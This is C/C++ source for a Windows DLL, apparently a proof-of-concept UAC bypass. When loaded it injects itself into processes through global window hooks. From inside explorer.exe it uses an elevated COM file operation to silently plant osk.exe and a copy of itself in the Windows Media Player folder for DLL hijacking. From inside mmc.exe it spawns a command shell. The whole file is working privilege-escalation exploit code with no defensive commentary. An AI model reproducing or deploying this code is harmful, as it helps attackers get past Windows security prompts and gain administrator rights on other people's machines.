#include #include #include #pragma comment(lib, "Ole32.lib") #pragma comment(lib, "shell32.lib") void WINAPI InitializeOSKSupport() {}; // this function must be exported! void WINAPI UninitializeOSKSupport() {}; // this function must be exported! int WINAPI hook(int code, WPARAM wParam, LPARAM lParam) { return (CallNextHookEx(NULL, code, wParam, lParam)); }; HINSTANCE hinstance; void CopyFile(LPCWSTR pszSrcItem, LPCWSTR pszNewName, LPCWSTR pszDest) { IFileOperation *pfo; IShellItem *psiFrom = NULL; IShellItem *psiTo = NULL; HRESULT hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE); if (SUCCEEDED(hr)) { OutputDebugString(L"[OSK_DLL_PWN] CoInitializeEx"); hr = CoCreateInstance(CLSID_FileOperation, NULL, CLSCTX_ALL, IID_PPV_ARGS(&pfo)); if (SUCCEEDED(hr)) { OutputDebugString(L"[OSK_DLL_PWN] CoCreateInstance"); hr = pfo->SetOperationFlags(FOF_NOCONFIRMATION | FOF_SILENT | FOFX_SHOWELEVATIONPROMPT | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION | FOF_NOERRORUI); if (SUCCEEDED(hr)) { OutputDebugString(L"[OSK_DLL_PWN] SetOperationFlags"); hr = SHCreateItemFromParsingName(pszSrcItem, NULL, IID_PPV_ARGS(&psiFrom)); if (SUCCEEDED(hr)) { OutputDebugString(L"[OSK_DLL_PWN] SHCreateItemFromParsingName"); if (NULL != pszDest) { hr = SHCreateItemFromParsingName(pszDest, NULL, IID_PPV_ARGS(&psiTo)); } if (SUCCEEDED(hr)) { OutputDebugString(L"[OSK_DLL_PWN] SHCreateItemFromParsingName 2"); hr = pfo->CopyItem(psiFrom, psiTo, pszNewName, NULL); } } if (SUCCEEDED(hr)) { hr = pfo->PerformOperations(); WCHAR buff[100] = { 0 }; wsprintf(buff, L"[OSK_DLL_PWN] PerformOperations = %d %.8x", hr, hr); OutputDebugString(buff); } } pfo->Release(); } CoUninitialize(); } } DWORD WINAPI explorerThread(LPVOID) { CopyFile(L"C:\\windows\\system32\\osk.exe", L"osk.exe", L"C:\\Program Files\\Windows Media Player"); WCHAR pathDll[1000] = { 0 }; GetModuleFileName(hinstance, pathDll, 1000); OutputDebugString(pathDll); CopyFile(pathDll, L"osksupport.dll", L"C:\\Program Files\\Windows Media Player"); return 0; } void Payload() { OutputDebugString(L"[OSK_DLL_PWN] Payload!"); WCHAR pathApp[1000] = { 0 }; GetModuleFileName(NULL, pathApp, 1000); OutputDebugString(pathApp); wcsupr(pathApp); if (wcsstr(pathApp, L"OSK.EXE")) { OutputDebugString(L"[OSK_DLL_PWN] Inside osk.exe"); HOOKPROC addr = (HOOKPROC)GetProcAddress(hinstance, "hook"); SetWindowsHookEx(WH_CALLWNDPROC, addr, hinstance, 0); Sleep(5000); TerminateProcess(GetCurrentProcess(), 0); } if (wcsstr(pathApp, L"UACBYPASS.EXE")) // here must be name of exe-part { OutputDebugString(L"[OSK_DLL_PWN] Inside uacbypass.exe"); HOOKPROC addr = (HOOKPROC)GetProcAddress(hinstance, "hook"); SetWindowsHookEx(WH_CALLWNDPROC, addr, hinstance, 0); } if (wcsstr(pathApp, L"MMC.EXE")) { OutputDebugString(L"[OSK_DLL_PWN] Inside mmc.exe"); STARTUPINFO si; PROCESS_INFORMATION pi; ZeroMemory(&si, sizeof(si)); si.cb = sizeof(si); ZeroMemory(&pi, sizeof(pi)); WCHAR path[100] = L"C:\\windows\\system32\\cmd.exe"; if (!CreateProcess(NULL, path, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) { OutputDebugString(L"[OSK_DLL_PWN] Spawn cmd failed"); } TerminateProcess(GetCurrentProcess(), 0); } if (wcsstr(pathApp, L"EXPLORER.EXE")) { OutputDebugString(L"[OSK_DLL_PWN] Inside explorer.exe"); DWORD dw= 0; CreateThread(NULL, NULL, explorerThread, NULL, 0, &dw); } } BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: hinstance = hModule; Payload(); break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; }